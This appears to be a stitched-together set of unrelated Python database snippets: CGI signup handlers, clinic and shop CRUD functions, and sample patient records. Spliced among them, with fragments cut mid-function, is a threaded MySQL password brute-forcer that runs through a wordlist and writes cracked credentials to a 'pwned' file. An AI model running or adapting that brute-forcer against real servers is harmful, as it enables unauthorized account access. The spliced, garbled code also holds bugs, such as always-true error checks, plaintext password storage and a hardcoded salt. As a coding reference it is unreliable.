def saveUser(dbconnection):
try:
form = cgi.FieldStorage()
name = form.getvalue("name")
username = form.getvalue("usernamesignup")
password = form.getvalue("pwsignup")
passwordcheck = form.getvalue("pwdsignupconfirm")
if password != passwordcheck:
print('Content-Type: text/html\n')
redirect = "http://localhost:8000/error.html"
print('<html>')
print(' <head>')
print(' <meta http-equiv="refresh" content="0;url=' +
str(redirect) + '" />')
print(' </head>')
print('</html>')
exit(1)
mycursor = dbconnection.cursor()
sql = 'INSERT INTO Users (Username, Pass, Name) VALUES (%s,%s,%s)'
vals = (username, password, name)
mycursor.execute(sql, vals)
dbconnection.commit()
return
except mysql.connector.Error as err:
if str(Error(errno=1062)):
print('Content-Type: text/html\n')
redirect = "http://localhost:8000/userexists.html"
print('<html>')
print(' <head>')
print(' <meta http-equiv="refresh" content="0;url=' +
str(redirect) + '" />')
print(' </head>')
print('</html>')
exit(1)
raise
def inserting_rows_into_doctors_table(self):
"""
inserting rows/records into doctors table
"""
try:
sql_insert_formula = "INSERT INTO doctors (doctor_id, date, name, specialization, availiability) VALUES (%s, %s, %s, %s, %s)"
mycursor = self.mydb.cursor()
current_date = datetime.date.today()
doctors_data = [
(111, current_date, "John Smith", "Pediatrician",
"12PM - 8PM"),
(222, current_date, "Bella Edward", "Cardiologist",
"10AM - 5PM"),
(333, current_date, "Susan Yara", "Dermatologist",
"10AM - 8PM"),
(444, current_date, "Jackson Wang", "Neurologist",
"10AM - 8PM"),
(555, current_date, "Edward Jenner", "Orthodontist",
"12AM - 8PM"),
(666, current_date, "Joseph Lister", "Dentist", "12PM - 8PM"),
(777, current_date, "Antony Young", "Plastic Surgeon",
"8AM - 2PM"),
(888, current_date, "John Smith", "Gynecologist",
"2PM - 10PM"),
]
mycursor.executemany(sql_insert_formula, doctors_data)
self.mydb.commit()
str(
Error(errno=1146,
sqlstate='42S02',
msg="Table 'clinic.doctors' doesn't exist"))
except mysql.connector.Error as e:
print("Error code:", e.errno) # error number
print("SQLSTATE value:", e.sqlstate) # SQLSTATE value
print("Error message:", e.msg)
def connectToDatabase(config):
"""
Function to establish connection with database
:param config: Database config
:return: Connection object
"""
try:
cnx = mysql.connector.connect(**config)
print("database connected")
return cnx
except Error:
print("Error occured: ", str(Error()))
return False
def inserting_rows_into_patients_table(self):
"""
inserting records into patients table
"""
try:
mycursor = self.mydb.cursor()
sql_patients_formula = "INSERT INTO patients (name, mobile_number, age) VALUES (%s, %s, %s)"
patients_data = [
("Olivia Young", "+1 310 5673457", 34),
("Harry Clark", "+1 310 8588347", 47),
("Noah Johnson", "+1 323 6838462", 17),
("Jack Sebastian", "+1 626 9757499", 19),
("Charlie Wilson", "+1 818 8738421", 15),
("Ace Park", "+1 323 2345558", 65),
("John Carter", "+1 323 4827824", 32),
("Sabrina Spellman", "+1 626 6426433", 18),
("Jackson Mark", "+1 626 1073979", 26),
("Emily Davis", "+1 626 9347928", 29),
("Blake Yaman", "+1 310 2979929", 67),
("Robert Jones", "+1 310 5497920", 46),
("James Charles", "+1 323 9127932", 22),
("Shawn Gray", "+1 323 2972082", 69),
("Jennifer Ellison", "+1 323 7393879", 52),
("Sohphia Smith", "+1 626 3733838", 43),
("Mia Mark", "+1 626 3868484", 12),
("Amelia Foster", "+1 818 3880201", 89),
("Harris Turner", "+1 818 8383438", 71),
("Anastasia Rogers", "+1 818 3111347", 35),
("Walter Lee", "+1 626 7733788", 44),
("David Cook", "+1 310 1793252", 27),
("Veronica Park", "+1 323 2034791", 39),
("Rosa Brown", "+1 310 9643821", 20),
("Camila Mendes", "+1 323 1125678", 34),
("Mariana Cox", "+1 626 3242841", 64),
]
mycursor.executemany(sql_patients_formula, patients_data)
self.mydb.commit()
str(
Error(errno=1146,
sqlstate='42S02',
msg="Table ' ' doesn't exist"))
except mysql.connector.Error as e:
print("Error code:", e.errno) # error number
print("SQLSTATE value:", e.sqlstate) # SQLSTATE value
print("Error message:", e.msg)
def postMessage(dbconnection):
try:
form = cgi.FieldStorage()
message = form.getvalue("message")
username = getCookies()
username = username.split("User=")
username = username[1]
print(username)
mycursor = dbconnection.cursor()
sql = 'INSERT INTO Messages (Username, Message) VALUES ((SELECT Username FROM Users WHERE Username =%s),%s)'
vals = (username, message)
mycursor.execute(sql, vals)
dbconnection.commit()
return
except mysql.connector.Error as err:
if str(Error(errno=1062)):
print(err)
raise
def brute(i):
ii = i.replace("\n", "")
try:
con = mysql.connect(host=server, user=user, passwd=ii)
arq = open("pwned-mysqli.txt", "a")
arq.write("Host:{} Usuario:{} Senha: {}".format(server, user, ii))
arq.close()
print("\n\n\t[{} INFO] Pwned: {}@{}:{}\n".format(tempo, server, user, ii))
exit()
except mysql.Error as err:
if Error(errno=1045):
alocthread.acquire()
string = str("[{} INFO] Incorreta: {}:{}".format(tempo, user, ii))
sys.stdout.write(string)
sys.stdout.flush()
backspace(len(string))
alocthread.release()
else:
print("Erro: {}".format(err))
def saveUser(dbconnection):
try:
form = cgi.FieldStorage()
name = form.getvalue("name")
username = form.getvalue("usernamesignup")
unhashpassword = form.getvalue("pwsignup")
unhashedpasswordcheck = form.getvalue("pwdsignupconfirm")
if unhashpassword != unhashedpasswordcheck:
print('Content-Type: text/html\n')
redirect = "http://localhost:8000/error.html"
print('<html>')
print(' <head>')
print(' <meta http-equiv="refresh" content="0;url=' +
str(redirect) + '" />')
print(' </head>')
print('</html>')
exit(1)
#storing the password securely!!
hashedpassword = unhashpassword.encode()
salt = b'zaqwsxcderfvbgty'
securepassword = hashlib.pbkdf2_hmac("sha256", hashedpassword, salt,
100000)
byte_array = securepassword
securepassword = byte_array.hex()
mycursor = dbconnection.cursor()
sql = 'INSERT INTO Users (Username, Pass, Name) VALUES (%s,%s,%s)'
vals = (username, securepassword, name)
mycursor.execute(sql, vals)
dbconnection.commit()
return
except mysql.connector.Error as err:
if str(Error(errno=1062)):
"""print('Content-Type: text/html\n')
redirect = "http://localhost:8000/userexists.html"
print('<html>')
print(' <head>')
print(' <meta http-equiv="refresh" content="0;url='+str(redirect)+'" />')
print(' </head>')
print('</html>')
exit(1)"""
raise
def inserting_rows_into_workers_table(self):
"""
insering records into workers table
"""
try:
mycursor = self.mydb.cursor()
sql_workers_formula = "INSERT INTO workers (worker_id, name, age, mobile_number, worker_position) VALUES (%s, %s, %s, %s, %s)"
workers_data = [
(100, "Terry Miller", 36, "+1 818 5356761", "Ward Boy"),
(200, "Harrison Baldwin", 28, "+1 326 8974233", "Clearner"),
(300, "Lilly Watson", 46, "+1 626 5667843", "Nurse"),
]
mycursor.executemany(sql_workers_formula, workers_data)
self.mydb.commit()
str(
Error(errno=1146,
sqlstate='42S02',
msg="Table ' ' doesn't exist"))
except mysql.connector.Error as e:
print("Error code:", e.errno) # error number
print("SQLSTATE value:", e.sqlstate) # SQLSTATE value
print("Error message:", e.msg)
def inserting_rows_into_bill_table(self):
"""
inserting rows into bill table which
contains patients bill details
"""
try:
mycursor = self.mydb.cursor()
sql_bill_formula = "INSERT INTO bill (patient_id, name, age, doctor_charges, room_charges, medicines, total_bill) VALUES (%s, %s, %s, %s, %s, %s, %s)"
bill_data = [
("1", "Olivia Young", 34, 1000, 1500, 1100, 3600),
("2", "Harry Clark", 47, 500, 0, 300, 800),
("3", "Noah Johnson", 17, 700, 300, 550, 1550),
]
mycursor.executemany(sql_bill_formula, bill_data)
self.mydb.commit()
str(
Error(errno=1146,
sqlstate='42S02',
msg="Table ' ' doesn't exist"))
except mysql.connector.Error as e:
print("Error code:", e.errno) # error number
print("SQLSTATE value:", e.sqlstate) # SQLSTATE value
print("Error message:", e.msg)
def sql_brands(config, option, key):
cnx = mariadb.connect(**config)
cur = cnx.cursor()
if option == 'cursor':
query = "SELECT * FROM MFbrands"
cur.execute(query)
cursor_brands = cur.fetchall()
cur.close()
cnx.close()
return cursor_brands
elif option == 'ins':
sql = "INSERT INTO MFbrands( brand, totalproducts, totalsales, totalpurchases, usercreate, datecreate, userlastupdate, datelastupdate ) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
data = (key, 0, 0, 0, 'admin', '2017-01-01 00:00:01', 'admin',
'2017-01-01 00:00:01')
#print (sql, data)
result = 0
try:
try:
cur.execute(sql, data)
except (mariadb.Error, mariadb.Warning) as err:
if Error(errno=2006):
print("Bran exist: {}".format(err))
flash('Brand name Exist', 'success')
else:
print("Oops! There was an error: {}".format(err))
flash('Oops! There was an error', 'success')
result = 1
finally:
cnx.commit()
cur.close()
cnx.close()
return result
elif option == 'get':
sql = "SELECT * FROM MFbrands WHERE brand = %s"
cur.execute(sql, [key])
register = cur.fetchone()
cur.close()
cnx.close()
return register
elif option == 'upd':
sql = "UPDATE MFbrands SET userlastupdate=%s WHERE brand = %s"
data = ('admin', key)
#print (sql, data)
try:
try:
cur.execute(sql, data)
except (mariadb.Error, mariadb.Warning) as err:
if Error(errno=2006):
print("Bran exist: {}".format(err))
else:
print("Oops! There was an error: {}".format(err))
flash('Oops! There was an error', 'success')
result = 1
result = 0
finally:
cnx.commit()
cur.close()
cnx.close()
return result
elif option == 'del':
sql = "DELETE FROM MFbrands WHERE brand = %s"
data = (key)
#print (sql, data)
result = 0
try:
try:
cur.execute("DELETE FROM MFbrands WHERE brand = %s", [key])
except (mariadb.Error, mariadb.Warning) as err:
print("Oops! There was an error: {}".format(err))
result = 1
flash('delete completed', 'success')
finally:
print("finally")
cnx.commit()
cur.close()
cnx.close()
return result
def get_connect():
if not GreenSql.conn:
raise Error('database connect error!')
return GreenSql.conn
alocthread.release()
else:
print("Erro: {}".format(err))
def iniciar():
try:
try:
wordlist = open(x.wordlist, 'r').readlines()
except:
print("\n[{} INFO] Verifique o caminho da wordlist e tente novamente...".format(tempo))
exit()
for i in wordlist:
time.sleep(0.4)
_thread.start_new_thread(brute, (i,))
print("\n\n\t[{} INFO] Fim do teste, obrigado por usar by B4l0x...\n".format(tempo))
_thread.exit()
except KeyboardInterrupt:
print("\n\n\t[{} INFO] Aguarde o script ser finalizado, obrigado por usar by B4l0x...\n".format(tempo))
exit()
try:
con = mysql.connect(host=server, user='******', passwd='teste')
except mysql.Error as err:
if Error(errno=1045):
print("[+] Host recebeu os pacotes")
print("[+] Iniciando brute force\n")
iniciar()
except:
print("\n[!] Verifique servidor e porta e tente novamente, host sem resposta")
exit()
def sql_customers(config, option, key, data):
cnx = mariadb.connect(**config)
cur = cnx.cursor()
print(config, option, key, data)
if option == 'cursor':
print('cursor')
query = "SELECT * FROM MFcustomers ORDER BY idcustomer DESC LIMIT 20"
cur.execute(query)
cursor_customers = cur.fetchall()
cur.close()
cnx.close()
print('bye cursor')
return cursor_customers
elif option == 'ins':
sql = "INSERT INTO MFcustomers( idcustomer, namecustomer, address , city, state , zipcode, email, phonenumber, usercreate, datecreate , userlastupdate, datelastupdate ) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
data = (0, data[1], data[2], data[3], data[4], data[5], data[6],
data[7], 'admin', '2018-01-01 00:00:01', 'admin',
'2018-01-01 00:00:01')
#print (sql,data)
result = 0
try:
try:
cur.execute(sql, data)
except (mariadb.Error, mariadb.Warning) as err:
if Error(errno=2006):
print("customer exist: {}".format(err))
flash('customer name Exist', 'success')
else:
print("Oops! There was an error: {}".format(err))
flash('Oops! There was an error', 'success')
result = 1
finally:
cnx.commit()
cur.close()
cnx.close()
return result
elif option == 'get':
print('get')
sql = "SELECT * FROM MFcustomers WHERE idcustomer = %s"
cur.execute(sql, [key])
register = cur.fetchone()
cur.close()
cnx.close()
return register
elif option == 'upd':
print('entro upd')
sql = "UPDATE MFcustomers SET namecustomer=%s,address=%s,city=%s,state=%s,zipcode=%s,email=%s,phonenumber=%s,usercreate=%s,datecreate=%s,userlastupdate=%s,datelastupdate=%s WHERE customer = %s"
data = (data[1], data[2], data[3], data[4], data[5], data[6], data[7],
'admin', '2018-01-01 00:00:01', 'admin', '2018-01-01 00:00:01',
key)
print(sql, data)
result = 0
try:
try:
cur.execute(sql, data)
except (mariadb.Error, mariadb.Warning) as err:
if Error(errno=2006):
print("Bran exist: {}".format(err))
else:
print("Oops! There was an error: {}".format(err))
flash('Oops! There was an error', 'success')
result = 1
finally:
print("finally")
cnx.commit()
cur.close()
cnx.close()
print('cerrando upd')
print(result)
return result
elif option == 'del':
print('del')
sql = "DELETE FROM MFcustomers WHERE customer = %s"
data = (key)
print(sql, data)
result = 0
try:
try:
cur.execute("DELETE FROM MFcustomers WHERE customer = %s",
[key])
except (mariadb.Error, mariadb.Warning) as err:
print("Oops! There was an error: {}".format(err))
result = 1
flash('delete completed', 'success')
finally:
print("finally")
cnx.commit()
cur.close()
cnx.close()
print('bye bye del')
print(result)
return result